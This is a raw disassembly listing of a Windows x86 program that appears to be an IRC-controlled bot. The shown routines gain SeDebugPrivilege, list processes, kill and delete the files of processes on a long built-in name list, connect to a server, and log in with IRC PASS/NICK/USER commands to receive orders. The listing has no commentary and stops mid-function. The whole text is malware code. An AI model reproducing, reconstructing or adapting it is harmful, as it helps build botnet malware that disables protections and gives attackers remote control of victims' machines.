push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_40705F: ; CODE XREF: sub_406E62+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_407076: ; CODE XREF: sub_406E62+D6�j
call ds:dword_41F014 ; ExitThread
loc_40707C: ; DATA XREF: .data:0042BBE4�o
; .data:0042BBF8�o ...
int 3 ; Trap to Debugger
sub_406E62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40707D proc near ; CODE XREF: sub_4058F3+7�p
; sub_4070E8+5F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_41F0B4 ; GetCurrentProcess
push eax
call dword_4335D4
test eax, eax
jnz short loc_40709C
leave
retn
; ---------------------------------------------------------------------------
loc_40709C: ; CODE XREF: sub_40707D+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_4335BC
test eax, eax
jz short loc_4070DA
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4070C3
or [ebp+var_8], 2
jmp short loc_4070C7
; ---------------------------------------------------------------------------
loc_4070C3: ; CODE XREF: sub_40707D+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4070C7: ; CODE XREF: sub_40707D+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_433508
mov esi, eax
loc_4070DA: ; CODE XREF: sub_40707D+32�j
push [ebp+var_4]
call ds:dword_41F034 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_40707D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070E8 proc near ; CODE XREF: sub_4073FB+68�p
; sub_4074FD+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_433490, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_4072F9
cmp dword_4334EC, ebx
jz loc_4072F9
cmp dword_433450, ebx
jz loc_4072F9
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
push ebx
push 0Fh
call dword_433490
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_4072EC
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_4334EC
test eax, eax
mov esi, ds:dword_41F034
jz loc_4072E7
lea eax, [ebp+var_12C]
push eax
push edi
call dword_433450
test eax, eax
jz loc_4072E7
mov ebx, ds:dword_41F0C4
loc_4071A7: ; CODE XREF: sub_4070E8+1F7�j
cmp [ebp+arg_10], 0
jz short loc_407208
xor edi, edi
loc_4071AF: ; CODE XREF: sub_4070E8+E7�j
push off_42A458[edi]
lea eax, [ebp+var_108]
push eax
call ds:dword_41F0C0 ; lstrcmpi
test eax, eax
jz short loc_4071D6
add edi, 4
cmp edi, 9E0h
jb short loc_4071AF
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071D6: ; CODE XREF: sub_4070E8+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_4072CD
push 0
push edi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz loc_4072CD
loc_407200: ; CODE XREF: sub_4070E8+1AF�j
push edi
call esi ; CloseHandle
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_407208: ; CODE XREF: sub_4070E8+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_40729C
cmp [ebp+arg_4], edi
jz loc_4072CD
push [ebp+var_124]
push 8
call dword_433490
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_40725C
lea eax, [ebp+var_350]
push eax
push edi
call dword_4334B8
test eax, eax
push [ebp+var_124]
jz short loc_407262
lea eax, [ebp+var_230]
jmp short loc_407268
; ---------------------------------------------------------------------------
loc_40725C: ; CODE XREF: sub_4070E8+152�j
push [ebp+var_124]
loc_407262: ; CODE XREF: sub_4070E8+16A�j
lea eax, [ebp+var_108]
loc_407268: ; CODE XREF: sub_4070E8+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_412BB5
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
jmp loc_407200
; ---------------------------------------------------------------------------
loc_40729C: ; CODE XREF: sub_4070E8+125�j
lea eax, [ebp+var_108]
loc_4072A2: ; CODE XREF: sub_4070E8+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_4072C4
test cl, cl
jz short loc_4072C0
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_4072C4
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_4072A2
loc_4072C0: ; CODE XREF: sub_4070E8+1C4�j
xor eax, eax
jmp short loc_4072C9
; ---------------------------------------------------------------------------
loc_4072C4: ; CODE XREF: sub_4070E8+1C0�j
; sub_4070E8+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4072C9: ; CODE XREF: sub_4070E8+1DA�j
test eax, eax
jz short loc_407300
loc_4072CD: ; CODE XREF: sub_4070E8+E9�j
; sub_4070E8+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_433450
test eax, eax
jnz loc_4071A7
xor ebx, ebx
loc_4072E7: ; CODE XREF: sub_4070E8+9D�j
; sub_4070E8+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_4072EC: ; CODE XREF: sub_4070E8+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40707D
pop ecx
pop ecx
loc_4072F9: ; CODE XREF: sub_4070E8+3A�j
; sub_4070E8+46�j ...
xor eax, eax
loc_4072FB: ; CODE XREF: sub_4070E8+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407300: ; CODE XREF: sub_4070E8+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_433490
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz short loc_407345
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_4072F9
; ---------------------------------------------------------------------------
loc_407345: ; CODE XREF: sub_4070E8+253�j
cmp [ebp+arg_18], 0
jz loc_4073F3
lea eax, [ebp+var_350]
push eax
push ebx
call dword_4334B8
test eax, eax
jz short loc_4073B8
push ebx
call esi ; CloseHandle
xor esi, esi
loc_407366: ; CODE XREF: sub_4070E8+2B2�j
push 7D0h
call ds:dword_41F000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call ds:dword_41F0A0 ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call ds:dword_41F0B8 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_4073AA
cmp esi, 5
jl short loc_407366
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073AA: ; CODE XREF: sub_4070E8+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_4073C4
; ---------------------------------------------------------------------------
loc_4073B8: ; CODE XREF: sub_4070E8+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_4073C4: ; CODE XREF: sub_4070E8+2C0�j
; sub_4070E8+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_4073F3
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_4073F3: ; CODE XREF: sub_4070E8+261�j
; sub_4070E8+2EF�j
xor eax, eax
inc eax
jmp loc_4072FB
sub_4070E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4073FB proc near ; DATA XREF: sub_4078FA+43C7�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_407453
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_407453: ; CODE XREF: sub_4073FB+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_4070E8
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40747C
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_407481
; ---------------------------------------------------------------------------
loc_40747C: ; CODE XREF: sub_4073FB+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_407481: ; CODE XREF: sub_4073FB+7F�j
push eax
call sub_412BB5
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4074A8
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4045DD
add esp, 14h
loc_4074A8: ; CODE XREF: sub_4073FB+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401C33
push [ebp+74h+var_14]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4073FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4074C6 proc near ; CODE XREF: sub_4078FA+35CA�p
; sub_410FD3+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_41F0C4 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_4074F8
push 0
push esi
call ds:dword_41F0BC ; TerminateProcess
test eax, eax
jnz short loc_4074F8
push esi
xor edi, edi
call ds:dword_41F034 ; CloseHandle
loc_4074F8: ; CODE XREF: sub_4074C6+1A�j
; sub_4074C6+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4074C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4074FD proc near ; DATA XREF: sub_4078FA+1EC7�o
push esi
xor esi, esi
loc_407500: ; CODE XREF: sub_4074FD+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_4070E8
add esp, 1Ch
push dword_42A450
call ds:dword_41F000 ; Sleep
jmp short loc_407500
sub_4074FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40751F proc near ; CODE XREF: sub_40779B+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_412DD0
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40753E: ; CODE XREF: sub_40751F+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40753E
cmp byte_479BB4, 0
jz short loc_407567
push offset byte_479BB4
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_404592
add esp, 0Ch
loc_407567: ; CODE XREF: sub_40751F+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_40E7B0
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_412BB5
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_407595: ; CODE XREF: sub_40751F+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407595
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_4075CD
push [ebp+58h+arg_0]
call dword_4335AC
push 7D0h
call ds:dword_41F000 ; Sleep
xor eax, eax
jmp loc_407794
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_40751F+91�j
push edi
jmp loc_40775A
; ---------------------------------------------------------------------------
loc_4075D3: ; CODE XREF: sub_40751F+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_40564B
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_40775A
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_4075FF: ; CODE XREF: sub_40751F+235�j
push offset asc_4246B4 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_413920
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_407629
add [ebp+58h+var_4], 2
jmp short loc_40762E
; ---------------------------------------------------------------------------
loc_407629: ; CODE XREF: sub_40751F+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40762E: ; CODE XREF: sub_40751F+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_412C40
lea eax, [ebp+58h+var_2AC]
push offset asc_4246B0 ; "|"
push eax
call sub_413859
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_407743
loc_407667: ; CODE XREF: sub_40751F+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_412C40
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_407693: ; CODE XREF: sub_40751F+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407693
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4076A3: ; CODE XREF: sub_40751F+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4076A3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4076BF: ; CODE XREF: sub_40751F+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4076BF
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_4246B0 ; "|"
push ebx
call sub_413859
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4076DF: ; CODE XREF: sub_40751F+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_4078FA
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_407727
push 0FAh
call ds:dword_41F000 ; Sleep
jmp short loc_4076DF
; ---------------------------------------------------------------------------
loc_407727: ; CODE XREF: sub_40751F+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_407790
cmp esi, 0FFFFFFFEh
jz short loc_40778B
cmp esi, 0FFFFFFFFh
jz short loc_407787
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_407667
loc_407743: ; CODE XREF: sub_40751F+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_4075FF
loc_40775A: ; CODE XREF: sub_40751F+AF�j
; sub_40751F+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_433414
test eax, eax
jg loc_4075D3
loc_407787: ; CODE XREF: sub_40751F+215�j
xor eax, eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_40778B: ; CODE XREF: sub_40751F+210�j
xor eax, eax
inc eax
jmp short loc_407793
; ---------------------------------------------------------------------------
loc_407790: ; CODE XREF: sub_40751F+20B�j
push 2
pop eax
loc_407793: ; CODE XREF: sub_40751F+26A�j
; sub_40751F+26F�j
pop edi
loc_407794: ; CODE XREF: sub_40751F+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40751F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40779B proc near ; CODE XREF: sub_40D1EF+472�p
; DATA XREF: sub_4078FA+296C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_407896
; ---------------------------------------------------------------------------
loc_4077C5: ; CODE XREF: sub_40779B+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42AE68
lea edi, [ebp+var_2C]
push dword_42AE64
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_40E7B0
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_434350
push edi
push eax
call sub_412C40
add esp, 1Ch
push 6
push ebx
push 2
call dword_4334A0
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_434344[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_4078CC
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401CA7
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40751F
add esp, 28h
push esi
mov edi, eax
call dword_4335AC
test edi, edi
jz short loc_407896
cmp edi, ebx
jnz short loc_407891
push 1D4C0h
call ds:dword_41F000 ; Sleep
jmp short loc_407896
; ---------------------------------------------------------------------------
loc_407891: ; CODE XREF: sub_40779B+E7�j
cmp edi, 2
jz short loc_4078E7
loc_407896: ; CODE XREF: sub_40779B+25�j
; sub_40779B+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_406B1D
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4077C5
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078CC: ; CODE XREF: sub_40779B+92�j
push esi
call dword_4335AC
call sub_406B46
push 7D0h
call ds:dword_41F000 ; Sleep
mov eax, ebx
jmp short loc_4078F3
; ---------------------------------------------------------------------------
loc_4078E7: ; CODE XREF: sub_40779B+F9�j
push [ebp+var_34]
call sub_4111AE
pop ecx
push 2
pop eax
loc_4078F3: ; CODE XREF: sub_40779B+12F�j
; sub_40779B+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40779B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078FA proc near ; CODE XREF: sub_40751F+1EC�p
var_2178 = byte ptr -2178h
var_1D78 = byte ptr -1D78h
var_1BE8 = byte ptr -1BE8h
var_19E8 = byte ptr -19E8h
var_18E8 = byte ptr -18E8h
var_17E8 = byte ptr -17E8h
var_15E8 = byte ptr -15E8h
var_15E4 = byte ptr -15E4h
var_14E4 = dword ptr -14E4h
var_14E0 = byte ptr -14E0h
var_13E0 = byte ptr -13E0h
var_1360 = dword ptr -1360h
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = byte ptr -1344h
var_1340 = byte ptr -1340h
var_1240 = byte ptr -1240h
var_123C = byte ptr -123Ch
var_11BC = byte ptr -11BCh
var_117C = byte ptr -117Ch
var_10EC = dword ptr -10ECh
var_10E8 = dword ptr -10E8h
var_10E4 = dword ptr -10E4h
var_10E0 = dword ptr -10E0h
var_10DC = dword ptr -10DCh
var_10D4 = byte ptr -10D4h
var_1054 = byte ptr -1054h
var_FD4 = dword ptr -0FD4h
var_FD0 = dword ptr -0FD0h
var_FCC = dword ptr -0FCCh
var_FC4 = dword ptr -0FC4h
var_FC0 = dword ptr -0FC0h
var_FBC = dword ptr -0FBCh
var_FB4 = dword ptr -0FB4h
var_FB0 = byte ptr -0FB0h
var_FAC = dword ptr -0FACh
var_FA8 = byte ptr -0FA8h
var_F28 = byte ptr -0F28h
var_E28 = byte ptr -0E28h
var_D29 = byte ptr -0D29h
var_D28 = byte ptr -0D28h
var_C28 = dword ptr -0C28h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = dword ptr -0C14h
var_C10 = dword ptr -0C10h
var_C0C = dword ptr -0C0Ch
var_C08 = dword ptr -0C08h
var_C04 = byte ptr -0C04h
var_B84 = dword ptr -0B84h
var_B80 = byte ptr -0B80h
var_B74 = byte ptr -0B74h
var_B70 = byte ptr -0B70h
var_B00 = byte ptr -0B00h
var_A80 = dword ptr -0A80h
var_A7C = dword ptr -0A7Ch
var_A78 = dword ptr -0A78h
var_A74 = dword ptr -0A74h
var_A70 = byte ptr -0A70h
var_A64 = byte ptr -0A64h
var_A54 = dword ptr -0A54h
var_A50 = byte ptr -0A50h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9D0 = byte ptr -9D0h
var_998 = byte ptr -998h
var_990 = byte ptr -990h
var_918 = byte ptr -918h
var_898 = dword ptr -898h
var_894 = dword ptr -894h
var_890 = dword ptr -890h
var_88C = dword ptr -88Ch
var_888 = dword ptr -888h
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_874 = dword ptr -874h
var_870 = byte ptr -870h
var_7F0 = byte ptr -7F0h
var_770 = dword ptr -770h
var_76C = dword ptr -76Ch
var_768 = dword ptr -768h
var_764 = dword ptr -764h
var_760 = dword ptr -760h
var_75C = dword ptr -75Ch
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = byte ptr -74Ch
var_67C = byte ptr -67Ch
var_66C = byte ptr -66Ch
var_648 = byte ptr -648h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = dword ptr -53Ch
var_538 = byte ptr -538h
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = dword ptr -4B0h
var_4AC = byte ptr -4ACh
var_44B = byte ptr -44Bh
var_44A = byte ptr -44Ah
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = dword ptr -444h
var_440 = byte ptr -440h
var_43E = byte ptr -43Eh
var_43C = byte ptr -43Ch
var_43B = byte ptr -43Bh
var_43A = byte ptr -43Ah
var_439 = byte ptr -439h
var_432 = byte ptr -432h
var_410 = byte ptr -410h
var_3F0 = dword ptr -3F0h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = dword ptr -3B4h
var_3B0 = dword ptr -3B0h
var_3AC = byte ptr -3ACh
var_390 = dword ptr -390h
var_38C = byte ptr -38Ch
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_378 = dword ptr -378h
var_374 = byte ptr -374h
var_30C = byte ptr -30Ch
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = dword ptr -0C4h
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2178h
call sub_412DD0
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2E0]
rep stosd
lea eax, [ebp+var_3AC]
push eax
mov [ebp+var_1C], 3
mov [ebp+var_18], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_AC], ebx
call sub_412C40
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_407B7D
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_17E8]
rep stosd
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
lea eax, [ebp+var_17E8]
push offset asc_4246B4 ; " :"
push eax
call sub_413920
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 28h
